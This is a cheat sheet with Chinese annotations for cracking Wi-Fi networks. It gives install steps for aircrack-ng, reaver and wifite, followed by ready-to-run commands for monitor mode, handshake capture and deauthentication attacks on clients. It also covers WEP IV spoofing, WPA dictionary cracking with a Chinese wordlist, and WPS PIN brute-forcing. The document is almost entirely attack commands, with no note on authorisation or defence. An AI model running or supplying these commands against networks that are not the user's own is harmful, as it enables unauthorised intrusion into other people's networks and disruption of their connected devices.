Cracking Wi-Fi
aircrack-ng
CentOS
$ sudo yum install "openssl-devel" "libnl3-devel" "iw" "ethtool" "pciutils" "tshark" "pyrit" "cowpatty"
Debian
$ sudo apt-get install "libssl-dev" "libnl-3-dev" "libnl-genl-3-dev" "iw" "ethtool" "tshark" "pyrit" "cowpatty"
http://aircrack-ng.org/
$ wget -c "http://download.aircrack-ng.org/aircrack-ng-1.2-rc3.tar.gz"
$ tar zxf "aircrack-ng-1.2-rc3.tar.gz"
$ cd "aircrack-ng-1.2-rc3"
$ make
$ sudo make install
$ cd ".."
$ sudo airodump-ng-oui-update
reaver
CentOS
$ sudo yum install "libpcap-devel" "sqlite-devel"
Debian
$ sudo apt-get install "libpcap-dev" "libsqlite3-dev"
https://code.google.com/p/reaver-wps/
$ wget -c "http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"
$ tar zxf "reaver-1.4.tar.gz"
$ cd "reaver-1.4/src"
$ ./configure
$ make
$ sudo make install
$ cd "../.."
wifite
https://github.com/derv82/wifite/
$ wget -c "https://github.com/derv82/wifite/raw/master/wifite.py"
$ chmod +x "wifite.py"
$ sudo mv "wifite.py" "/usr/local/bin/wifite"
Scanning
扫描并仅显示开启 WPS 的 AP
$ wifite -wps
扫描仅以 WEP 模式加密的 AP
$ wifite -wep
指定字典文件
$ wifite -dict "/root/w/china_super_wpa_wordlist.txt"
列出网卡
$ airmon-ng
使网卡 wlan0 进入监视模式
$ airmon-ng start wlan0
列出 AP 列表
$ airodump-ng mon0
捕捉信号包
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0 --ivs
Attacking
发送 deauth 信号
$ aireplay-ng -0 5 -a BSSID -c CLIENT_MAC mon0
$ aireplay-ng -3 -a BSSID -c CLIENT_MAC mon0
IVs 欺骗
$ aireplay-ng -c 6 -1 0 -a "00:21:27:22:4c:2e" -h "00:1a:ef:0a:8e:bc" mon0
$ aireplay-ng -c 6 -2 -F -p 0841 -c "ff:ff:ff:ff:ff:ff" -b "00:21:27:22:4C:2E" -h "00:1a:ef:0a:8e:bc" mon0
aireplay-ng 工具攻击模式
$ Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
Cracking
字典破解 WPA 握手包
$ aircrack-ng -w WORDLIST -b BSSID -e ESSID HANSHAKE
PIN 码暴力破解
$ reaver -i mon0 -b BSSID -c CHANNEL -v -S -a -d 0 -t 10 -s /media/VM/crack/ESSID.wpc -p PIN
WPA 握手包字典破解
"D:\aircrack-ng\bin\aircrack-ng.exe" -w "/cygdrive/h/Temp/Crack/w/china_super_wpa_wordlist.txt" -e "ESSID" -b "BSSID" "/cygdrive/h/Temp/Crack/cap/ESSID.cap"